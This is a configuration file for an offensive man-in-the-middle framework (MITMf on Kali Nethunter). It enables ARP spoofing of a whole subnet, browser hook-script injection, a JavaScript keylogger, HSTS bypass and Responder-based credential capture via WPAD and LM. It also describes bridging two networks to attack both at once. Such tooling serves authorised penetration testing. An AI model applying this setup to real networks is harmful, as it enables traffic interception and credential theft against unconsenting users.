## Configuration file for Nethunter MITMF improved.
## Uncomment the line if you plan to add anything after the "=" sign
## Otherwise keep it commented out to prevent errors from the config parser
## 0 is OFF
## 1 is ON

INTERFACE = eth0
INJECT = 1
    JS_URL = http://127.0.0.1:3000/hook.js
#    HTML_URL =
HTA_DRIVEBY = 0
#    HTA_TEXT =
#    HTA_APP =


SPOOF = 1
# You have four spoofing options
# ARP, DNS, DHCP, ICMP
    SPOOF_TYPE = ARP
    SPOOF_GATEWAY = 10.30.0.1
# Leaving SPOOF_TARGET commented out will spoof the entire subnet
#    SPOOF_TARGET =


APP_POISON = 1
UPSIDEDOWN_INTERNET = 0
BROWSER_PROFILER = 1
FILEPWN = 0
SMB_AUTH = 0


FERRET_NG = 0
#    FERRET_NG_PORT = 1000
#    FERRET_NG_COOKIES =
BROWSER_SNIPER = 0
JS_KEYLOGGER = 1
REPLACE = 0
HSTS = 1


RESPONDER_PLUGIN = 1
    RESPONDER_ANALYZE = 0
    RESPONDER_WREDIR = 1
    RESPONDER_NBTNS = 1
    RESPONDER_FINGERPRINT = 1
    RESPONDER_LM = 1
    RESPONDER_WPAD = 1
    RESPONDER_FORCE_WPADAUTH = 1

# Activate the Proxy ARP bridge between two network interfaces
# This is handy when you want two completely segregated networks between two physical network cards to be reachable (by both sides)
# That allows you to physically attack both networks at once, or make one segregated network attack the other (two different routers connected to two of your Wi-Fi adapters)
# Please read more about Proxy ARP Daemons https://blog.pgeiser.com/posts/2017/04/wireless-to-ethernet-bridge-with-an-arp-proxy/
PROXY_ARP_MODE = 0
# This can be two wireless cards, wlan1 + wlan2 or a ethernet card eth0 + wlan0
	NETIFACE_ONE = eth0
	NETIFACE_TWO = wlan0
# Extremely verbose output, be warned!
	PARP_DEBUG_MODE = 0
